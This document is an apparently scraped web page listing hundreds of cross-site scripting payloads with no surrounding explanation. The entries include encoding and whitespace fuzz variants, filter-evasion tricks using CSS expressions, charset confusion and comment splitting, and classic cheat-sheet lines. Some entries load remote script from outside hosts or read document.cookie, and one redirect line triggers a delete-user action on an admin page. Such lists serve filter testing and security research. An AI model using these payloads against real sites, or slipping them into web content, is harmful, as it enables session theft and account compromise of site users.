ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\x20expression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\x00expression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF |
link |
<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> |
link |
"'><img src=xxx:x \x22onerror=javascript:alert(1)> |
link |
"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> |
link |
"'><img src=xxx:x \x0Donerror=javascript:alert(1)> |
link |
"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> |
link |
"'><img src=xxx:x \x09onerror=javascript:alert(1)> |
link |
"'><img src=xxx:x \x0Conerror=javascript:alert(1)> |
link |
"'><img src=xxx:x \x00onerror=javascript:alert(1)> |
link |
"'><img src=xxx:x \x27onerror=javascript:alert(1)> |
link |
"'><img src=xxx:x \x20onerror=javascript:alert(1)> |
link |
"`'><script>\x3Bjavascript:alert(1)</script> |
link |
"`'><script>\x0Djavascript:alert(1)</script> |
link |
"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> |
link |
"`'><script>\xE2\x80\x81javascript:alert(1)</script> |
link |
"`'><script>\xE2\x80\x84javascript:alert(1)</script> |
link |
"`'><script>\xE3\x80\x80javascript:alert(1)</script> |
link |
"`'><script>\x09javascript:alert(1)</script> |
link |
"`'><script>\xE2\x80\x89javascript:alert(1)</script> |
link |
"`'><script>\xE2\x80\x85javascript:alert(1)</script> |
link |
"`'><script>\xE2\x80\x88javascript:alert(1)</script> |
link |
"`'><script>\x00javascript:alert(1)</script> |
link |
"`'><script>\xE2\x80\xA8javascript:alert(1)</script> |
link |
"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> |
link |
"`'><script>\xE1\x9A\x80javascript:alert(1)</script> |
link |
"`'><script>\x0Cjavascript:alert(1)</script> |
link |
"`'><script>\x2Bjavascript:alert(1)</script> |
link |
"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> |
link |
"`'><script>-javascript:alert(1)</script> |
link |
"`'><script>\x0Ajavascript:alert(1)</script> |
link |
"`'><script>\xE2\x80\xAFjavascript:alert(1)</script> |
link |
"`'><script>\x7Ejavascript:alert(1)</script> |
link |
"`'><script>\xE2\x80\x87javascript:alert(1)</script> |
link |
"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> |
link |
"`'><script>\xE2\x80\xA9javascript:alert(1)</script> |
link |
"`'><script>\xC2\x85javascript:alert(1)</script> |
link |
"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> |
link |
"`'><script>\xE2\x80\x83javascript:alert(1)</script> |
link |
"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> |
link |
"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> |
link |
"`'><script>\xE2\x80\x80javascript:alert(1)</script> |
link |
"`'><script>\x21javascript:alert(1)</script> |
link |
"`'><script>\xE2\x80\x82javascript:alert(1)</script> |
link |
"`'><script>\xE2\x80\x86javascript:alert(1)</script> |
link |
"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> |
link |
"`'><script>\x0Bjavascript:alert(1)</script> |
link |
"`'><script>\x20javascript:alert(1)</script> |
link |
"`'><script>\xC2\xA0javascript:alert(1)</script> |
link |
"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> |
link |
"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> |
link |
"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> |
link |
"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> |
link |
"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> |
link |
"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> |
link |
"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> |
link |
"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> |
link |
"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> |
link |
<script\x2F>javascript:alert(1)</script> |
link |
<script\x20>javascript:alert(1)</script> |
link |
<script\x0D>javascript:alert(1)</script> |
link |
<script\x0A>javascript:alert(1)</script> |
link |
<script\x0C>javascript:alert(1)</script> |
link |
<script\x00>javascript:alert(1)</script> |
link |
<script\x09>javascript:alert(1)</script> |
link |
"><img src=x onerror=javascript:alert(1)> |
link |
"><img src=x onerror=javascript:alert('1'`)> |
link |
"><img src=x onerror=javascript:alert("1"`)> |
link |
"><img src=x onerror=javascript:alert(`1`)> |
link |
"><img src=x onerror=javascript:alert(('1`'))> |
link |
"><img src=x onerror=javascript:alert(("1`"))> |
link |
"><img src=x onerror=javascript:alert((`1`))> |
link |
"><img src=x onerror=javascript:alert(A)> |
link |
"><img src=x onerror=javascript:alert((A)`)> |
link |
"><img src=x onerror=javascript:alert(('A`'))> |
link |
"><img src=x onerror=javascript:alert('A'`)> |
link |
"><img src=x onerror=javascript:alert(("A`"))> |
link |
"><img src=x onerror=javascript:alert("A"`)> |
link |
"><img src=x onerror=javascript:alert((`A`))> |
link |
"><img src=x onerror=javascript:alert(`A`)> |
link |
"'><img src=xxx:x onerror\x0B=javascript:alert(1)> |
link |
"'><img src=xxx:x onerror\x00=javascript:alert(1)> |
link |
"'><img src=xxx:x onerror\x0C=javascript:alert(1)> |
link |
"'><img src=xxx:x onerror\x0D=javascript:alert(1)> |
link |
"'><img src=xxx:x onerror\x20=javascript:alert(1)> |
link |
"'><img src=xxx:x onerror\x0A=javascript:alert(1)> |
link |
"'><img src=xxx:x onerror\x09=javascript:alert(1)> |
link |
<script>javascript:alert(1)<\x00/script> |
link |
<img src=# onerror\x3D"javascript:alert(1)" > |
link |
<input onfocus=javascript:alert(1) autofocus> |
link |
<input onblur=javascript:alert(1) autofocus><input autofocus> |
link |
<video poster=javascript:javascript:alert(1)// |
link |
<video><source onerror="javascript:javascript:alert(1)"> |
link |
<video onerror="javascript:javascript:alert(1)"><source> |
link |
<form><button formaction="javascript:javascript:alert(1)">X |
link |
<body oninput=javascript:alert(1)><input autofocus> |
link |
<table background="javascript:javascript:alert(1)"> |
link |
<!--<img src="--><img src=x onerror=javascript:alert(1)/`/"> |
link |
<comment><img src="</comment><img src=x onerror=javascript:alert(1))`//"> |
link |
<![><img src="]><img src=x onerror=javascript:alert(1)/`/"> |
link |
<style><img src="</style><img src=x onerror=javascript:alert(1)/`/"> |
link |
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body> |
link |
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> |
link |
<object data="data:text/html;base64,%(base64)s"> |
link |
<embed src="data:text/html;base64,%(base64)s"> |
link |
<b <script>alert(1)</script>0 |
link |
<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)/`/'> |
link |
<img src="javascript:alert(1)"> |
link |
<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x |
link |
<? foo="><script>javascript:alert(1)</script>"> |
link |
<! foo="><script>javascript:alert(1)</script>"> |
link |
</ foo="><script>javascript:alert(1)</script>"> |
link |
<? foo="><x foo='?><script>javascript:alert(1)</script>'>"> |
link |
<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> |
link |
<% foo><x foo="%><script>javascript:alert(1)</script>"> |
link |
<img \x47src=x onerror="javascript:alert(1)"> |
link |
<img \x11src=x onerror="javascript:alert(1)"> |
link |
<img \x12src=x onerror="javascript:alert(1)"> |
link |
<img\x47src=x onerror="javascript:alert(1)"> |
link |
<img\x10src=x onerror="javascript:alert(1)"> |
link |
<img\x13src=x onerror="javascript:alert(1)"> |
link |
<img\x32src=x onerror="javascript:alert(1)"> |
link |
<img\x47src=x onerror="javascript:alert(1)"> |
link |
<img\x11src=x onerror="javascript:alert(1)"> |
link |
<img \x47src=x onerror="javascript:alert(1)"> |
link |
<img \x34src=x onerror="javascript:alert(1)"> |
link |
<img \x39src=x onerror="javascript:alert(1)"> |
link |
<img \x00src=x onerror="javascript:alert(1)"> |
link |
<img src\x09=x onerror="javascript:alert(1)"> |
link |
<img src\x10=x onerror="javascript:alert(1)"> |
link |
<img src\x13=x onerror="javascript:alert(1)"> |
link |
<img src\x32=x onerror="javascript:alert(1)"> |
link |
<img src\x12=x onerror="javascript:alert(1)"> |
link |
<img src\x11=x onerror="javascript:alert(1)"> |
link |
<img src\x00=x onerror="javascript:alert(1)"> |
link |
<img src\x47=x onerror="javascript:alert(1)"> |
link |
<img src=x\x09onerror="javascript:alert(1)"> |
link |
<img src=x\x10onerror="javascript:alert(1)"> |
link |
<img src=x\x11onerror="javascript:alert(1)"> |
link |
<img src=x\x12onerror="javascript:alert(1)"> |
link |
<img src=x\x13onerror="javascript:alert(1)"> |
link |
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> |
link |
<img src=x onerror=\x09"javascript:alert(1)"> |
link |
<img src=x onerror=\x10"javascript:alert(1)"> |
link |
<img src=x onerror=\x11"javascript:alert(1)"> |
link |
<img src=x onerror=\x12"javascript:alert(1)"> |
link |
<img src=x onerror=\x32"javascript:alert(1)"> |
link |
<img src=x onerror=\x00"javascript:alert(1)"> |
link |
<a href=javascript:javascript:alert(1)>XXX</a> |
link |
<img src="x <script>javascript:alert(1)</script>" > |
link |
<img src onerror /" '"= alt=javascript:alert(1)//"> |
link |
<title onpropertychange=javascript:alert(1)></title><title title=> |
link |
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)>`</a>"> |
link |
<!--[if]><script>javascript:alert(1)</script --> |
link |
<!--[if<img src=x onerror=javascript:alert(1)/`/]> --> |
link |
<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X |
link |
<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d |
link |
<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> |
link |
<div style="font-family:'foo ;color:red;';">XXX |
link |
<div style="font-family:foo}color=red;">XXX |
link |
<// style=x:expression\28javascript:alert(1)\29> |
link |
<style>*{x:expression(javascript:alert(1))}</style> |
link |
<div style=content:url(%(svg)s)></div> |
link |
<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X |
link |
<div style="background:url(/f#oo/;color:red/*/foo.jpg);">X |
link |
<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X |
link |
<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> |
link |
<x style="background:url('x;color:red;/*')">XXX</x> |
link |
<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> |
link |
<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> |
link |
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> |
link |
<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> |
link |
<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ |
link |
X<x style=`behavior:url(#default#time2)`onbegin=`javascript:alert(1)`> |
link |
<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> |
link |
<event-source src="%(event)s" onload="javascript:alert(1)"> |
link |
<script>%(payload)s</script> |
link |
<script language='javascript' src='%(jscript)s'></script> |
link |
<IMG SRC="javascript:javascript:alert(1);"> |
link |
<IMG SRC=javascript:javascript:alert(1)> |
link |
<IMG SRC=`javascript:javascript:alert(1)`> |
link |
<SCRIPT SRC=%(jscript)s?<B> |
link |
<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> |
link |
<BODY ONLOAD=javascript:alert(1)> |
link |
<BODY ONLOAD=javascript:javascript:alert(1)> |
link |
<IMG SRC="jav ascript:javascript:alert(1);"> |
link |
<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> |
link |
<IMG SRC="javascript:javascript:alert(1)" |
link |
<iframe src=%(scriptlet)s < |
link |
<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> |
link |
<IMG DYNSRC="javascript:javascript:alert(1)"> |
link |
<IMG LOWSRC="javascript:javascript:alert(1)"> |
link |
<BGSOUND SRC="javascript:javascript:alert(1);"> |
link |
<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> |
link |
<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> |
link |
<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS |
link |
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> |
link |
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> |
link |
<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> |
link |
<TABLE BACKGROUND="javascript:javascript:alert(1)"> |
link |
<TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> |
link |
<DIV STYLE="background-image: url(javascript:javascript:alert(1))"> |
link |
<DIV STYLE="width:expression(javascript:alert(1));"> |
link |
<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> |
link |
<XSS STYLE="xss:expression(javascript:alert(1))"> |
link |
<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> |
link |
<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> |
link |
<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> |
link |
<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> |
link |
<BASE HREF="javascript:javascript:alert(1);//"> |
link |
<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> |
link |
<SCRIPT SRC="%(jpg)s"></SCRIPT> |
link |
<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X |
link |
<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> |
link |
<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> |
link |
<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> |
link |
<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> |
link |
<style onreadystatechange=javascript:javascript:alert(1);></style> |
link |
<embed code=javascript:javascript:alert(1);></embed> |
link |
<embed src=%(jscript)s></embed> |
link |
<frameset onload=javascript:javascript:alert(1)></frameset> |
link |
<object onerror=javascript:javascript:alert(1)> |
link |
<embed type="image" src=%(scriptlet)s></embed> |
link |
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml> |
link |
<a href="javAascript:javascript:alert(1)">test1</a> |
link |
<a href="javaascript:javascript:alert(1)">test1</a> |
link |
<embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed> |
link |
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; |
link |
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- |
link |
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> |
link |
'';!--"<XSS>=&{()} |
link |
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> |
link |
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> |
link |
<a onmouseover="alert(document.cookie)">xxs link</a> |
link |
<a onmouseover=alert(document.cookie)>xxs link</a> |
link |
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> |
link |
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> |
link |
<IMG SRC=# onmouseover="alert('xxs')"> |
link |
<IMG SRC="jav	ascript:alert('XSS');"> |
link |
<IMG SRC="jav
ascript:alert('XSS');"> |
link |
<IMG SRC="jav
ascript:alert('XSS');"> |
link |
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out |
link |
<IMG SRC="  javascript:alert('XSS');"> |
link |
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> |
link |
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B > |
link |
<SCRIPT SRC=//ha.ckers.org/.j> |
link |
<iframe src=http://ha.ckers.org/scriptlet.html < |
link |
\";alert('XSS');// |
link |
</TITLE><SCRIPT>alert("XSS");</SCRIPT> |
link |
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> |
link |
<BODY BACKGROUND="javascript:alert('XSS')"> |
link |
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> |
link |
<IMG SRC="livescript:[code]"> |
link |
<BODY ONLOAD=alert('XSS')> |
link |
<BGSOUND SRC="javascript:alert('XSS');"> |
link |
<BR SIZE="&{alert('XSS')}"> |
link |
<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> |
link |
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> |
link |
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> |
link |
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> |
link |
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> |
link |
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> |
link |
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> |
link |
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'> |
link |
<STYLE TYPE="text/javascript">alert('XSS');</STYLE> |
link |
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> |
link |
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> |
link |
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> |
link |
<XSS STYLE="xss:expression(alert('XSS'))"> |
link |
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> |
link |
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> |
link |
<IFRAME SRC="javascript:alert('XSS');"></IFRAME> |
link |
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> |
link |
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> |
link |
<TABLE BACKGROUND="javascript:alert('XSS')"> |
link |
<TABLE><TD BACKGROUND="javascript:alert('XSS')"> |
link |
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> |
link |
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> |
link |
<DIV STYLE="width: expression(alert('XSS'));"> |
link |
<BASE HREF="javascript:alert('XSS');//"> |
link |
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> |
link |
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> |
link |
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> |
link |
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> |
link |
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser |
link |
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> |
link |
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<SCRIPT a=`>`SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> |
link |
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> |
link |
<A HREF="http://0102.0146.0007.00000223/">XSS</A> |
link |
<A HREF="htt p://6 6.000146.0x7.147/">XSS</A> |
link |
<iframe src="	javascript:prompt(1)	"> |
link |
<svg><style>{font-family:'<iframe/onload=confirm(1)>' |
link |
<input/onmouseover="javaSCRIPT:confirm(1)" |
link |
<sVg><scRipt >alert(1) {Opera} |
link |
<img/src=`` onerror=this.onerror=confirm(1) |
link |
<form><isindex formaction="javascript:confirm(1)" |
link |
<img src=``
 onerror=alert(1)
 |
link |
<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script> |
link |
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? |
link |
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> |
link |
<script /**/>/**/alert(1)/**/</script /**/ |
link |
"><h1/onmouseover='\u0061lert(1)'> |
link |
<iframe/src="data:text/html,<svg onload=alert(1)>"> |
link |
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/> |
link |
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script |
link |
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} |
link |
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> |
link |
<iframe src=javascript:alert(document.location)> |
link |
<form><a href="javascript:\u0061lert(1)">X |
link |
</script><img/*/src="worksinchrome:prompt(1)"/*/onerror='eval(src)'> |
link |
<img/	  src=`~`onerror=prompt(1)> |
link |
<form><iframe 	  src="javascript:alert(1)" 	;> |
link |
http://www.google<script .com>alert(document.location)</script |
link |
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a |
link |
<img/src=@  onerror = prompt('1') |
link |
<style/onload=prompt('XSS') |
link |
<script ^__^>alert(String.fromCharCode(49))</script ^__^ |
link |
</style  ><script   :-(>/**/alert(document.location)/**/</script   :-( |
link |
�</form><input type="date" onfocus="alert(1)"> |
link |
<form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'> |
link |
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ |
link |
<iframe srcdoc='<body onload=prompt(1)>'> |
link |
<a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a> |
link |
<style/onload=<!--	> alert (1)> |
link |
<///style///><span %2F onmousemove='alert(1)'>SPAN |
link |
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1) |
link |
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>' |
link |
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera} |
link |
<marquee onstart='javascript:alert(1)'>^__^ |
link |
<div/style="width:expression(confirm(1))">X</div> {IE7} |
link |
<iframe// src=javaSCRIPT:alert(1) |
link |
//<form/action=javascript:alert(document.cookie)><input/type='submit'>// |
link |
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> |
link |
//|\\ <script //|\\ src='<https://dl.dropbox.com/u/13018058/js.js'>> //|\\ </script //|\\ |
link |
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style> |
link |
<a/href="javascript: javascript:prompt(1)"><input type="X"> |
link |
</plaintext\></|\><plaintext/onmouseover=prompt(1) |
link |
